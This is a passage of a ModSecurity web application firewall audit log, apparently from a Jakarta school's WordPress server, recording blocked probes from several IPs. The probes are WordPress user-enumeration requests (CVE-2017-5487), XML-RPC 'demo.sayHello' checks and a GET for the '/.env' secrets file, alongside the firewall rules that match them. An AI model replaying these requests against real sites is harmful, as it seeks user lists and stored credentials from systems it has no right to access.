Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcc15501-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747434666174824 6977 (- - -) Stopwatch2: 1747434666174824 6977; combined=5020, p1=599, p2=4131, p3=67, p4=44, p5=105, sr=75, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bcc15501-Z-- --3ef7b84b-A-- [17/May/2025:05:34:56 +0700] aCe9kHyxdQCiyU1ENFclRQAAAAs 103.236.140.4 40394 103.236.140.4 8181 --3ef7b84b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3ef7b84b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ef7b84b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747434896741224 3568 (- - -) Stopwatch2: 1747434896741224 3568; combined=1456, p1=486, p2=932, p3=0, p4=0, p5=37, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ef7b84b-Z-- --8f979042-A-- [17/May/2025:05:35:03 +0700] aCe9l3yxdQCiyU1ENFclSAAAABE 103.236.140.4 40400 103.236.140.4 8181 --8f979042-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.59 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8f979042-C-- demo.sayHello --8f979042-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f979042-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747434903192720 5869 (- - -) Stopwatch2: 1747434903192720 5869; combined=4238, p1=556, p2=3413, p3=32, p4=37, p5=121, sr=71, sw=79, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f979042-Z-- --1259776a-A-- [17/May/2025:05:37:36 +0700] aCe-MHyxdQCiyU1ENFclSQAAAA8 103.236.140.4 40404 103.236.140.4 8181 --1259776a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 142.93.250.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 142.93.250.227 X-Forwarded-Proto: https Connection: close User-Agent: SonyEricssonK550i/R1JD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 Accept-Charset: utf-8 --1259776a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1259776a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747435056269374 782 (- - -) Stopwatch2: 1747435056269374 782; combined=314, p1=272, p2=0, p3=0, p4=0, p5=42, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1259776a-Z-- --2da1313d-A-- [17/May/2025:05:42:46 +0700] aCe_ZgTOsBn9MSWb6WJtcQAAAIw 103.236.140.4 40532 103.236.140.4 8181 --2da1313d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.119 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2da1313d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2da1313d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747435366784724 2320 (- - -) Stopwatch2: 1747435366784724 2320; combined=1087, p1=392, p2=669, p3=0, p4=0, p5=26, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2da1313d-Z-- --3daf9d2e-A-- [17/May/2025:05:42:52 +0700] aCe_bHyxdQCiyU1ENFclewAAAAM 103.236.140.4 40550 103.236.140.4 8181 --3daf9d2e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.119 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3daf9d2e-C-- demo.sayHello --3daf9d2e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3daf9d2e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747435372882587 5417 (- - -) Stopwatch2: 1747435372882587 5417; combined=4092, p1=530, p2=3349, p3=29, p4=31, p5=91, sr=75, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3daf9d2e-Z-- --344d6752-A-- [17/May/2025:05:42:54 +0700] aCe_bgTOsBn9MSWb6WJtcgAAAIo 103.236.140.4 40554 103.236.140.4 8181 --344d6752-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.204 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --344d6752-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --344d6752-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747435374522698 2358 (- - -) Stopwatch2: 1747435374522698 2358; combined=1098, p1=342, p2=730, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --344d6752-Z-- --daae8838-A-- [17/May/2025:05:42:59 +0700] aCe_c3yxdQCiyU1ENFclhAAAABE 103.236.140.4 40572 103.236.140.4 8181 --daae8838-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.204 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --daae8838-C-- demo.sayHello --daae8838-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --daae8838-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747435379307313 4438 (- - -) Stopwatch2: 1747435379307313 4438; combined=3467, p1=407, p2=2883, p3=20, p4=19, p5=80, sr=65, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --daae8838-Z-- --7f42d456-A-- [17/May/2025:05:48:01 +0700] aCfAoRKi5m5upc8uMd6hTgAAANA 103.236.140.4 41284 103.236.140.4 8181 --7f42d456-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7f42d456-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f42d456-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747435681426167 3149 (- - -) Stopwatch2: 1747435681426167 3149; combined=1367, p1=427, p2=903, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f42d456-Z-- --a6c2fb2b-A-- [17/May/2025:05:48:07 +0700] aCfApwTOsBn9MSWb6WJtsAAAAIQ 103.236.140.4 41300 103.236.140.4 8181 --a6c2fb2b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.92 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a6c2fb2b-C-- demo.sayHello --a6c2fb2b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6c2fb2b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747435687495232 5899 (- - -) Stopwatch2: 1747435687495232 5899; combined=4348, p1=558, p2=3567, p3=32, p4=36, p5=93, sr=78, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6c2fb2b-Z-- --a27f153f-A-- [17/May/2025:05:48:24 +0700] aCfAuBKi5m5upc8uMd6haQAAAMM 103.236.140.4 41342 103.236.140.4 8181 --a27f153f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a27f153f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a27f153f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747435704242920 2190 (- - -) Stopwatch2: 1747435704242920 2190; combined=1196, p1=389, p2=779, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a27f153f-Z-- --c0937f2c-A-- [17/May/2025:05:48:29 +0700] aCfAvRKi5m5upc8uMd6hcAAAAM8 103.236.140.4 41356 103.236.140.4 8181 --c0937f2c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.182 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c0937f2c-C-- demo.sayHello --c0937f2c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0937f2c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747435709297822 4665 (- - -) Stopwatch2: 1747435709297822 4665; combined=3720, p1=443, p2=3079, p3=23, p4=24, p5=89, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0937f2c-Z-- --4f7bf24d-A-- [17/May/2025:05:49:06 +0700] aCfA4gTOsBn9MSWb6WJtuQAAAI8 103.236.140.4 41440 103.236.140.4 8181 --4f7bf24d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.48 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.48 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4f7bf24d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f7bf24d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747435746367762 2832 (- - -) Stopwatch2: 1747435746367762 2832; combined=1222, p1=390, p2=802, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f7bf24d-Z-- --6885ce37-A-- [17/May/2025:05:49:11 +0700] aCfA53yxdQCiyU1ENFcmGQAAABI 103.236.140.4 41456 103.236.140.4 8181 --6885ce37-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.48 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.48 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6885ce37-C-- demo.sayHello --6885ce37-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6885ce37-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747435751359408 4794 (- - -) Stopwatch2: 1747435751359408 4794; combined=3711, p1=444, p2=3067, p3=24, p4=25, p5=89, sr=69, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6885ce37-Z-- --1788192a-A-- [17/May/2025:05:50:36 +0700] aCfBPBKi5m5upc8uMd6hgwAAANA 103.236.140.4 41594 103.236.140.4 8181 --1788192a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.56 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1788192a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1788192a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747435836345581 3482 (- - -) Stopwatch2: 1747435836345581 3482; combined=1451, p1=479, p2=941, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1788192a-Z-- --b9072f69-A-- [17/May/2025:05:50:41 +0700] aCfBQRKi5m5upc8uMd6hhQAAANM 103.236.140.4 41600 103.236.140.4 8181 --b9072f69-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.213 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b9072f69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9072f69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747435841006869 2337 (- - -) Stopwatch2: 1747435841006869 2337; combined=1129, p1=375, p2=722, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9072f69-Z-- --3f0b1a19-A-- [17/May/2025:05:50:41 +0700] aCfBQXyxdQCiyU1ENFcmOgAAAAE 103.236.140.4 41602 103.236.140.4 8181 --3f0b1a19-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.56 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f0b1a19-C-- demo.sayHello --3f0b1a19-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f0b1a19-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747435841521500 5412 (- - -) Stopwatch2: 1747435841521500 5412; combined=4076, p1=514, p2=3344, p3=29, p4=32, p5=93, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f0b1a19-Z-- --7df58e23-A-- [17/May/2025:05:50:45 +0700] aCfBRQTOsBn9MSWb6WJtxQAAAIc 103.236.140.4 41610 103.236.140.4 8181 --7df58e23-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.213 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7df58e23-C-- demo.sayHello --7df58e23-F-- 